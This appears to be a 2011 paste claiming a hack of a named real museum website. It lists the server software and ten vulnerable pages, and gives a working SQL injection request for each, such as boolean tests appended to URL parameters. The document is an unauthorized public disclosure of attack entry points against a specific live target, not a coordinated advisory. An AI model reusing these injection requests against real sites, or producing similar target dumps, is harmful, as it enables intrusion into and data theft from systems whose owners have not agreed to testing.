sepo

www.museoscienza.org/ hacked by SEPO

Dec 4th, 2011
Target: http://www.museoscienza.org/

Server banner Microsoft-IIS/6.0
Operating system Windows Web server IIS 6.0
Technologies ASP.NET

========================================================================
SQL injection

Affected items
/audio/audio.asp
/dipartimenti/catalogo_collezioni/scheda_oggetto.asp
/gallery/gallery.asp
/leonardo/modelli/macchina-leo.asp
/museoingiro/dettaglio.asp
/myTest/vis_test.asp
/news/dettaglio.asp
/scuole/archivio_crei.asp
/scuole/proposta_dett.asp
/video/video.asp

ex.:
GET /audio/audio.asp?audio=42+and+31337-31337=0
GET /dipartimenti/catalogo_collezioni/scheda_oggetto.asp?idk_in=ST060-00001'+and+31337-31337='0&arg=Astronomia
GET /gallery/gallery.asp?gallery=139+and+31337-31337=0
GET /leonardo/modelli/macchina-leo.asp?id_macchina=11+and+31337-31337=0
GET /museoingiro/dettaglio.asp?id_mig=49+and+31337-31337=0&archivio=no
GET /myTest/vis_test.asp?q=30+and+31337-31337=0
GET /news/dettaglio.asp?idnotizia=549+and+31337-31337=0
GET /scuole/archivio_crei.asp?provenienza=3+and+31337-31337=0
GET /scuole/proposta_dett.asp?proposta=2&dip=9&sez=44+and+31337-31337=0&num=7
GET /scuole/proposta_dett.asp?proposta=2&dip=9+and+31337-31337=0&sez=44
GET /video/video.asp?video=64+and+31337-31337=0&cat=LEONARDO